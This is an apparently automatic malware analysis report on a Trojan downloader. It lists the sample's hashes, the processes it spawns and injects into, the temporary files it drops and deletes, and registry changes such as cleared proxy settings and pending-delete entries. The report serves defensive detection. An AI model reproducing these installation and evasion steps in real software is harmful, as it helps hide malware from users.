Trojan.NSIS.StartPage_2a8f25cc1f

by malwarelabrobot on November 28th, 2016 in Malware Descriptions.

Trojan-Downloader.NSIS.Adload.bx (Kaspersky), Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 2a8f25cc1fb9b6a8a14ec60736204e6f
SHA1: a74b910fcf8ce654ff7c033db73829927da9ebb4
SHA256: 1962b2d744537ea4c47fd9558d603cff83277737549f96c7ecc3b9c947a6b08e
SSDeep: 49152:vkojVzPgTpZLN8lT0RwkducdYETwAUC6asxS1HDJ:vkrZLmKRwtcdYETwfC6aYSP
Size: 2660132 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

Setup__2140_il2.exe:3044
sevensetup.exe:2608
583afdedde2bb_ua.exe:1576
cpSetup.exe:2892
G5wycqyxwV.exe:3900

The Trojan injects its code into the following process(es):

Setup__2140_il2.exe:896
setup.exe:1104
%original file name%.exe:3584

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process Setup__2140_il2.exe:3044 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\index[1].htm (9382 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\index[1].htm (0 bytes)

The process Setup__2140_il2.exe:896 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (7399 bytes)

The process sevensetup.exe:2608 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\inetc.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8PAU9PHE.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PXLM8U2Q.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe (253391 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss94B0.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\inetc.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe (0 bytes)

The process cpSetup.exe:2892 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\normal_bg[1].jpg (1633 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z6N4XLNR\appImg[1].jpg (4 bytes)

The process setup.exe:1104 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\spc_player.dll (64 bytes)

The process G5wycqyxwV.exe:3900 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\nsArray.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe (52926 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4673.tmp (1568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\cpSetup.exe (58228 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\1104817113 (871 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\sevensetup.exe (4705 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\NSISdl.dll (31 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4662.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\nsArray.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\1104817113 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\sevensetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\cpSetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\NSISdl.dll (0 bytes)

The process %original file name%.exe:3584 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\ItNP6AjIFY (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\G5wycqyxwV.exe (5293 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\583afdd9a9098[1].exe (3920 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\launch_reb[1].htm (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B (38534 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn28B5.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp (0 bytes)

Registry activity

The process Setup__2140_il2.exe:3044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\vinyls.tramell]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
"(Default)" = "{a0e998a2-81f0-420b-a12b-563442cf5349}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
"(Default)" = "InstallerLib"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1479738615"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
"(Default)" = "vinyls.tramell.1"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]
"(Default)" = "vinyls.tramell"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"

[HKCR\vinyls.tramell.1\CLSID]
"(Default)" = "{dded0858-104b-4eec-a82e-a44b49d78594}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"(Default)" = "{A0E998A2-81F0-420B-A12B-563442CF5349}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
"(Default)" = "IBoot"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
"(Default)" = "Inst Class"

[HKCR\vinyls.tramell.1]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3A 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
"(Default)" = "1.0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "50 6C 24 3E C4 48 D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCR\vinyls.tramell\CurVer]
"(Default)" = "vinyls.tramell.1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
[HKCR\vinyls.tramell.1]
[HKCR\vinyls.tramell\CurVer]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Programmable]
[HKCR\vinyls.tramell.1\CLSID]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
[HKCR\vinyls.tramell]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable"

The process Setup__2140_il2.exe:896 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\vinyls.tramell]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
"(Default)" = "{a0e998a2-81f0-420b-a12b-563442cf5349}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
"(Default)" = "InstallerLib"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1479738615"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
"(Default)" = "vinyls.tramell.1"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]
"(Default)" = "vinyls.tramell"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"

[HKCR\vinyls.tramell.1\CLSID]
"(Default)" = "{dded0858-104b-4eec-a82e-a44b49d78594}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"(Default)" = "{A0E998A2-81F0-420B-A12B-563442CF5349}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
"(Default)" = "IBoot"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
"(Default)" = "Inst Class"

[HKCR\vinyls.tramell.1]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
"(Default)" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "50 6C 24 3E C4 48 D2 01"

[HKCR\vinyls.tramell\CurVer]
"(Default)" = "vinyls.tramell.1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

The process sevensetup.exe:2608 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "50 6C 24 3E C4 48 D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe,"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process 583afdedde2bb_ua.exe:1576 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"

The process cpSetup.exe:2892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1480239567"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "cpSetup.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "50 6C 24 3E C4 48 D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 37 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process G5wycqyxwV.exe:3900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe,"

The process %original file name%.exe:3584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionTime" = "10 CC 7D 3D C4 48 D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "10 CC 7D 3D C4 48 D2 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

Dropped PE files

MD5	File path
ce4b14250ff2c67d88aea6a5dc084652	c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\583afdd9a9098[1].exe
